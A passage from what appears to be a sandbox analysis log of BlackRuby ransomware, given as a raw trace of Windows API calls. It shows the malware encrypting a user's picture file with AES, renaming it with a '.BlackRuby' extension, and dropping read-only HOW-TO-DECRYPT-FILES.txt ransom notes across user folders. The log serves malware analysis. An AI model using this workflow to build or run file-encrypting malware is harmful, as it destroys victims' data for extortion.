0x1 [0061.830] GetFileType (hFile=0x258) returned 0x1 [0061.830] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x17d62 [0061.830] GetLastError () returned 0x0 [0061.831] ReadFile (in: hFile=0x258, lpBuffer=0x2b5d080, nNumberOfBytesToRead=0x17d62, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x2b5d080*, lpNumberOfBytesRead=0x18ec40*=0x17d62, lpOverlapped=0x0) returned 1 [0061.832] GetLastError () returned 0x0 [0061.832] CloseHandle (hObject=0x258) returned 1 [0061.832] GetLastError () returned 0x0 [0061.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.833] GetLastError () returned 0x0 [0061.833] SetErrorMode (uMode=0x1) returned 0x0 [0061.833] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92ac4a0, ftCreationTime.dwHighDateTime=0x1d35228, ftLastAccessTime.dwLowDateTime=0xe291eae0, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0xe291eae0, ftLastWriteTime.dwHighDateTime=0x1d35991, nFileSizeHigh=0x0, nFileSizeLow=0x17d62)) returned 1 [0061.833] GetLastError () returned 0x0 [0061.833] SetErrorMode (uMode=0x0) returned 0x1 [0061.833] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c818) returned 1 [0061.833] GetLastError () returned 0x0 [0061.869] CryptImportKey (in: hProv=0x37c818, pbData=0x1bfdc20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ee0) returned 1 [0061.869] GetLastError () returned 0x0 [0061.869] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.869] GetLastError () returned 0x0 [0061.875] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.875] GetLastError () returned 0x0 [0061.875] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360d60) returned 1 [0061.875] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0061.875] GetLastError () returned 0x0 [0061.875] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1c2ac6c*=0x1, dwFlags=0x0) returned 1 [0061.875] GetLastError () returned 0x0 [0061.875] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1c2ac38, dwFlags=0x0) returned 1 [0061.875] GetLastError () returned 0x0 [0061.875] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b8cc80*, pdwDataLen=0x18ec30*=0x17e60, dwBufLen=0x17e60 | out: pbData=0x2b8cc80*, pdwDataLen=0x18ec30*=0x17e60) returned 1 [0061.876] GetLastError () returned 0x0 [0061.876] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c2acc8*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c2acc8*, pdwDataLen=0x18ec48*=0x10) returned 1 [0061.876] GetLastError () returned 0x0 [0061.876] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2acf8*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c2acf8*, pdwDataLen=0x18ec50*=0x10) returned 1 [0061.876] GetLastError () returned 0x0 [0061.878] CryptDestroyKey (hKey=0x360ee0) returned 1 [0061.878] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.878] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0061.878] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.878] GetLastError () returned 0x0 [0061.878] SetErrorMode (uMode=0x1) returned 0x0 [0061.878] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.879] GetLastError () returned 0xb7 [0061.879] GetFileType (hFile=0x258) returned 0x1 [0061.879] SetErrorMode (uMode=0x0) returned 0x1 [0061.879] GetFileType (hFile=0x258) returned 0x1 [0061.881] CloseHandle (hObject=0x258) returned 1 [0061.881] GetLastError () returned 0xb7 [0061.881] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif", lpFilePart=0x0) returned 0x59 [0061.881] GetLastError () returned 0xb7 [0061.881] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_K8y5fAf8b2D6aRyTke25j3ukhxsbdT6fllmw.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_K8y5fAf8b2D6aRyTke25j3ukhxsbdT6fllmw.BlackRuby", lpFilePart=0x0) returned 0x7b [0061.881] GetLastError () returned 0xb7 [0061.881] SetErrorMode (uMode=0x1) returned 0x0 [0061.881] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92ac4a0, ftCreationTime.dwHighDateTime=0x1d35228, ftLastAccessTime.dwLowDateTime=0xe291eae0, ftLastAccessTime.dwHighDateTime=0x1d35991, ftLastWriteTime.dwLowDateTime=0x2d13bea0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x17e70)) returned 1 [0061.882] GetLastError () returned 0xb7 [0061.882] SetErrorMode (uMode=0x0) returned 0x1 [0061.882] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\VCTZfCurGhT_7PJuCJ.gif" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\vctzfcurght_7pjucj.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\Encrypted_K8y5fAf8b2D6aRyTke25j3ukhxsbdT6fllmw.BlackRuby" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\encrypted_k8y5faf8b2d6arytke25j3ukhxsbdt6fllmw.blackruby")) returned 1 [0061.882] GetLastError () returned 0xb7 [0061.883] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5b [0061.883] GetLastError () returned 0xb7 [0061.883] SetErrorMode (uMode=0x1) returned 0x0 [0061.883] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\Eubu5teofqfo69sQ\\1P056aF6CxX\\Nor_13lnnjN\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\pictures\\eubu5teofqfo69sq\\1p056af6cxx\\nor_13lnnjn\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.883] GetLastError () returned 0x5 [0061.884] SetErrorMode (uMode=0x0) returned 0x1 [0061.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\PrintHood", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\PrintHood", lpFilePart=0x0) returned 0x1a [0061.884] GetLastError () returned 0x5 [0061.884] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.884] GetLastError () returned 0x5 [0061.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.884] GetLastError () returned 0x5 [0061.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\PrintHood", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\PrintHood", lpFilePart=0x0) returned 0x1a [0061.884] GetLastError () returned 0x5 [0061.884] SetErrorMode (uMode=0x1) returned 0x0 [0061.884] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\PrintHood\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0061.884] GetLastError () returned 0x5 [0061.885] SetErrorMode (uMode=0x0) returned 0x1 [0061.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Recent", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Recent", lpFilePart=0x0) returned 0x17 [0061.885] GetLastError () returned 0x5 [0061.885] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.885] GetLastError () returned 0x5 [0061.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.885] GetLastError () returned 0x5 [0061.885] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Recent", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Recent", lpFilePart=0x0) returned 0x17 [0061.885] GetLastError () returned 0x5 [0061.885] SetErrorMode (uMode=0x1) returned 0x0 [0061.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Recent\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0xffffffff [0061.885] GetLastError () returned 0x5 [0061.886] SetErrorMode (uMode=0x0) returned 0x1 [0061.886] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games", lpFilePart=0x0) returned 0x1c [0061.886] GetLastError () returned 0x5 [0061.887] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.887] GetLastError () returned 0x5 [0061.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.887] GetLastError () returned 0x5 [0061.887] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games", lpFilePart=0x0) returned 0x1c [0061.887] GetLastError () returned 0x5 [0061.887] SetErrorMode (uMode=0x1) returned 0x0 [0061.887] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.887] GetLastError () returned 0x5 [0061.887] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.887] GetLastError () returned 0x5 [0061.887] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.887] GetLastError () returned 0x5 [0061.887] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.887] GetLastError () returned 0x12 [0061.887] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.887] SetErrorMode (uMode=0x0) returned 0x1 [0061.887] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games", lpFilePart=0x0) returned 0x1c [0061.887] GetLastError () returned 0x12 [0061.887] SetErrorMode (uMode=0x1) returned 0x0 [0061.887] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.887] GetLastError () returned 0x12 [0061.887] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.887] GetLastError () returned 0x12 [0061.887] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.887] GetLastError () returned 0x12 [0061.888] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.888] GetLastError () returned 0x12 [0061.888] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.888] SetErrorMode (uMode=0x0) returned 0x1 [0061.888] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games\\desktop.ini", lpFilePart=0x0) returned 0x28 [0061.888] GetLastError () returned 0x12 [0061.888] SetErrorMode (uMode=0x1) returned 0x0 [0061.888] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\desktop.ini" (normalized: "c:\\users\\eebsym5\\saved games\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c4b080 | out: lpFileInformation=0x1c4b080*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec45a820, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0061.888] GetLastError () returned 0x12 [0061.888] SetErrorMode (uMode=0x0) returned 0x1 [0061.888] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x35 [0061.888] GetLastError () returned 0x12 [0061.888] SetErrorMode (uMode=0x1) returned 0x0 [0061.888] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\saved games\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.889] GetLastError () returned 0x0 [0061.889] GetFileType (hFile=0x258) returned 0x1 [0061.889] SetErrorMode (uMode=0x0) returned 0x1 [0061.889] GetFileType (hFile=0x258) returned 0x1 [0061.889] WriteFile (in: hFile=0x258, lpBuffer=0x1c66cb0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c66cb0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0061.890] GetLastError () returned 0x0 [0061.890] CloseHandle (hObject=0x258) returned 1 [0061.890] GetLastError () returned 0x0 [0061.890] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x35 [0061.890] GetLastError () returned 0x0 [0061.890] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Saved Games\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.891] GetLastError () returned 0x0 [0061.891] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches", lpFilePart=0x0) returned 0x19 [0061.891] GetLastError () returned 0x0 [0061.891] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0061.891] GetLastError () returned 0x0 [0061.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0061.891] GetLastError () returned 0x0 [0061.891] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches", lpFilePart=0x0) returned 0x19 [0061.891] GetLastError () returned 0x0 [0061.891] SetErrorMode (uMode=0x1) returned 0x0 [0061.891] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.891] GetLastError () returned 0x0 [0061.891] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.891] GetLastError () returned 0x0 [0061.891] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.891] GetLastError () returned 0x0 [0061.892] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.892] GetLastError () returned 0x0 [0061.892] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.892] GetLastError () returned 0x0 [0061.892] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.892] GetLastError () returned 0x12 [0061.892] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.892] SetErrorMode (uMode=0x0) returned 0x1 [0061.892] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches", lpFilePart=0x0) returned 0x19 [0061.892] GetLastError () returned 0x12 [0061.892] SetErrorMode (uMode=0x1) returned 0x0 [0061.892] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0061.892] GetLastError () returned 0x12 [0061.892] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.892] GetLastError () returned 0x12 [0061.893] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.893] GetLastError () returned 0x12 [0061.893] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.893] GetLastError () returned 0x12 [0061.893] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0061.893] GetLastError () returned 0x12 [0061.893] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0061.893] GetLastError () returned 0x12 [0061.893] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0061.893] SetErrorMode (uMode=0x0) returned 0x1 [0061.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\desktop.ini", lpFilePart=0x0) returned 0x25 [0061.893] GetLastError () returned 0x12 [0061.893] SetErrorMode (uMode=0x1) returned 0x0 [0061.893] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\desktop.ini" (normalized: "c:\\users\\eebsym5\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1c69e24 | out: lpFileInformation=0x1c69e24*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ebeb90, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ebeb90, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0061.893] GetLastError () returned 0x12 [0061.893] SetErrorMode (uMode=0x0) returned 0x1 [0061.894] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.894] GetLastError () returned 0x12 [0061.894] SetErrorMode (uMode=0x1) returned 0x0 [0061.894] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0061.895] GetLastError () returned 0x0 [0061.895] GetFileType (hFile=0x258) returned 0x1 [0061.895] SetErrorMode (uMode=0x0) returned 0x1 [0061.895] GetFileType (hFile=0x258) returned 0x1 [0061.895] WriteFile (in: hFile=0x258, lpBuffer=0x1c85950*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c85950*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0061.897] GetLastError () returned 0x0 [0061.897] CloseHandle (hObject=0x258) returned 1 [0061.897] GetLastError () returned 0x0 [0061.897] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.897] GetLastError () returned 0x0 [0061.897] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0061.898] GetLastError () returned 0x0 [0061.898] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\Everywhere.search-ms", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\Everywhere.search-ms", lpFilePart=0x0) returned 0x2e [0061.898] GetLastError () returned 0x0 [0061.898] SetErrorMode (uMode=0x1) returned 0x0 [0061.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1c875cc | out: lpFileInformation=0x1c875cc*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0061.898] GetLastError () returned 0x0 [0061.898] SetErrorMode (uMode=0x0) returned 0x1 [0061.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x32 [0061.899] GetLastError () returned 0x0 [0061.899] SetErrorMode (uMode=0x1) returned 0x0 [0061.899] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Searches\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\searches\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0061.899] GetLastError () returned 0x5 [0061.900] SetErrorMode (uMode=0x0) returned 0x1 [0061.900] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\Indexed Locations.search-ms", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Searches\\Indexed Locations.search-ms", lpFilePart=0x0) returned 0x35 [0061.900] GetLastError () returned 0x5 [0061.901] SetErrorMode (uMode=0x1) returned 0x0 [0061.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\eebsym5\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x1ca5140 | out: lpFileInformation=0x1ca5140*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x8e98a30, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8e98a30, 